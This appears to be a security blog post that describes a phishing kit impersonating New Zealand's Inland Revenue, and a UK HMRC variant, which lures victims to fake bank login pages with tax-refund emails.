A month ago, the New Zealand Department of Inland Revenue (IRD) issued a warning advising people not to respond to scam emails claiming to offer tax refunds. We have observed these types of scams before, but the individual campaigns come and go. Like any other phishing scam, this email campaign appears to look like a legitimate notification from Inland Revenue complete with the logo.
The link in the message body points to a phony web page that mimics the New Zealand IRD website. But the odd thing is the instruction in a red font stating “Please click on your following bank logo to continue the refund procedure”.
Clicking on any of the bank logos opens a fake login page that requires the user to enter their banking credentials and other personal details.
While digging around the phishing site, we came across a “readme.txt” file. It basically left hints that this phishing page was a kit authored by “MaxDeMon” written specifically to target online banking users of a range of New Zealand banks.
But Google searching some keywords from the phishing kit, it looks like the kit is used a lot and comes in different variations. Here is a screenshot of a fake “Tax Refund Portal” mimicking UK’s HM Revenue and Customs webpage, again instructing users to click on their bank logo:
The above suggests the ‘package’ is shared around, to be used by multiple groups. Such people only need a PHP web server (preferably a hacked web server) and to configure a PHP file to send phished banking information to their email address. That’s pretty easy, and probably why these type of phishing scams are persistent.